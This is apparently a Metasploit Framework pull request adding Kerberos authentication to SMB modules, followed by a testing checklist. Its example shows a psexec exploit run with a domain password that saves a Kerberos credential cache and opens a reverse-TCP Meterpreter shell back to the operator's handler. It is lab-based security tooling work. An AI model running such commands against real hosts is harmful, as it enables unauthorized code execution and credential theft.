rapid7/metasploit-framework
# Add initial smb kerberos authentication support

Add initial SMB kerberos authentication support; Builds upon the work of:

- Add Kerberos LoginScanner support - https://github.com/rapid7/metasploit-framework/pull/16625
- Fix Kerberos flags decoding logic - https://github.com/rapid7/metasploit-framework/pull/16660
- Track negotiation security buffer - https://github.com/rapid7/ruby_smb/pull/229

### Example

psexec working via Kerberos authentication:

```
msf6 exploit(windows/smb/psexec) > rerun rhosts=192.168.123.136 domaincontrollerrhost=192.168.123.136 smbrhostname=dc3.adf3.local smbuser=test_unconstrained smbpass=p4$$w0rd smbdomain=adf3.local smbauth=kerberos smb::AlwaysEncrypt=false SMB::ProtocolVersion=1,2,3
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.1.239:4444 
[*] 192.168.123.136:445 - Connecting to the server...
[*] 192.168.123.136:445 - Authenticating to 192.168.123.136:445|adf3.local as user 'test_unconstrained'...
[+] 192.168.123.136:88 - Valid TGS-Response, extracting credentials...
[+] 192.168.123.136:88 - MIT Credential Cache saved to ~/.msf4/loot/20220623134914_default_192.168.123.136_windows.kerberos_130728.bin
[*] 192.168.123.136:445 - Selecting PowerShell target
[*] 192.168.123.136:445 - Executing the payload...
[+] 192.168.123.136:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.1.239
[*] Meterpreter session 5 opened (192.168.1.239:4444 -> 192.168.1.239:51940) at 2022-06-23 13:49:17 +0100

meterpreter > 
```

### Wireshark

Wireshark showing the TGT/TGS handshake, and the AP Req as part of the smb session setup

<img width="1456" alt="image" src="https://user-images.githubusercontent.com/60357436/173250454-35815bcf-856b-4a37-abaf-adb9128a7f99.png">

## Verification

When testing the various Kerberos modules, we should ensure the following scenarios:

Run modules against the following accounts:
- Valid account
  - Invalid account
  - Locked/Disabled account
  - Account with expired password
  - Accounts with spaces
  - Accounts with preauthentication turned off
  - Ensure clock skew issues are bubbled up to the user, i.e. outputting local time vs server time to the user.
- Ensure invalid realms are handled correctly, i.e. reporting to the user that the realm is invalid. Auth brute modules should not - continue brute forcing in this scenario.
- Ensure DNS resolving issues are covered, i.e. manually specifying rhost/domain controller IPs
- Ensure modules can run through a pivoted target
vEnsure John hashes can be cracked
- Ensure documentation is up to date

SMB
- SMB 1 / 2 / 3
- SMB Encryption
- Remote host not supporting Kerberos Authentication
- Ensure NTLM authentication continues to work
- Logoff works

Minimal test targets:
- Windows server 2008
- Windows server 2012
- Windows server 2016
- Windows server 2022
- Verify behavior against Linux targets
